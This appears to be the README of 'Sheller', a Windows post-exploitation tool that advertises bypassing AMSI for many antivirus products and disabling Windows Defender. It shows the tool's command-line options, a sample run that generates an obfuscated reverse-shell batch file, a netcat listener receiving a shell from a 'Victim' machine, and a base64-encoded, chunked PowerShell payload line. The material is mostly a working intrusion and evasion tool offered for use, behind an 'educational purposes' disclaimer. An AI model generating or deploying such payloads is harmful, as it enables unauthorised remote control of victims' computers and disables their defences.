Sheller is a Windows Post Exploitation Tool to bypass all known Anti-Malware Scanner Interfaces including Defender, Bitdefender, Kaspersky, McAfee, NANO-Antivirus, Kingsoft, Avast, Avira and many more.
For use, python3 and powershell (Windows) or pwsh (Linux) are required, the script supports Windows and Linux distribution. The module sheller is to gain reverse shell to the victims device, providing several amsi bypass modules such as encoding, chunking and var randomization. There is a module to disable any windows defender antivirus feature if executed with admin privileges too.
root@lukeproducts:~/Sheller# python3 sheller.py
Copyright LukeProducts 2022, all rights reserved
┌──────────────────────────────────────┐
│ ▼ ## │
│ ┌─────────────────┘ ┌────##───┐ │
│ │AMSI Bypass Tool │ ## │ │
│ └──────────────────────┘ ## └─► │
│ ## │
│ © Copyright by LukeProducts ## │
└──────────────────────────────────────┘
usage: a.py [-h] [-s SHELLOUTNAME] [-avkill ANTIVIRUSKILL] [-lh LOCALHOST] [-ph PAYLOADHOST] [-pp PAYLOADPORT]
[-lstp LISTENPORT] [-lp LOCALPORT] [-b64] [-ch] [-v]
optional arguments:
-h, --help show this help message and exit
-s SHELLOUTNAME, --shelloutname SHELLOUTNAME
Reverse Shell. Value: fileoutputname. Requires: [-lh] [-lp], optional: [-b64] [-ch] [-v]
-avkill ANTIVIRUSKILL, --antiviruskill ANTIVIRUSKILL
script to deactivate AV of victim if executed with admin privileges. Optional flag: [-b64]
[-ch]
-lh LOCALHOST, --localhost LOCALHOST
host for payload ("lh" for automatically assign host to this systems address)
-ph PAYLOADHOST, --payloadhost PAYLOADHOST
host to connect to
-pp PAYLOADPORT, --payloadport PAYLOADPORT
port to to connect to
-lstp LISTENPORT, --listenport LISTENPORT
port to listen on with netcat
-lp LOCALPORT, --localport LOCALPORT
port for payload (4 digit number recommended)
-b64 encodes payload to base64
-ch chunks up base64 encoded string (chunking probability in CHUNK_PROBABILITY)
-v, --varencode changes all variables names to an random 10 hex digit encoded into VAR_ENCODING encoding
type (default is md5)
root@lukeproducts:~/Sheller# python3 sheller.py -s xy.bat -lh lh -lp 4444 -b64 -ch -v
Copyright LukeProducts 2022, all rights reserved
┌──────────────────────────────────────┐
│ ▼ ## │
│ ┌─────────────────┘ ┌────##───┐ │
│ │AMSI Bypass Tool │ ## │ │
│ └──────────────────────┘ ## └─► │
│ ## │
│ © Copyright by LukeProducts ## │
└──────────────────────────────────────┘
Host set to "LukeProductsKali" (192.168.0.129)
[*] Successfully exported payload to "xy.bat" with encoding base64 and chunked up 87 times!
listening on [any] 4444 ...
connect to [192.168.0.129] from (UNKNOWN) [192.168.0.129] 1716
Microsoft Windows [Version 10.0.19042.1415]
(c) Microsoft Corporation. All rights reserved.
D:\Victim>
powershell /w 1 /C "$a=[scriptblock]::create([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAAYwBsAGUAYQBuAHUAcAAgAHsAaQBm'+'ACAAKAAkADMAYwBhADQAYgBhADUANgA2AGMAZgBlAGQANQBjADEAYwA1ADMAMQBmAGQAMgA1ADkAYgBjAGYAMAA5ADcAOAAuAEMAbwBuAG4AZQBjAHQAZQBkACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsAJAAzAGMAYQA0AGIAYQA1ADYANgBjAGYAZQBk'+'ADUAYwAx'+'...')));Invoke-Command -ScriptBlock $a"
If you use Windows to run this script, make sure to turn off Defenders RealTimeProtection for this script, because this causes program truncations multiple times. The reason for that is that AMSI flaggs sheller at runtime.
DISCLAIMER: THIS IS FOR EDUCATIONAL PURPOSES ONLY! NO LIABILITY FOR ILLEGAL USE IS ASSUMED!
© Copyright by LukeProducts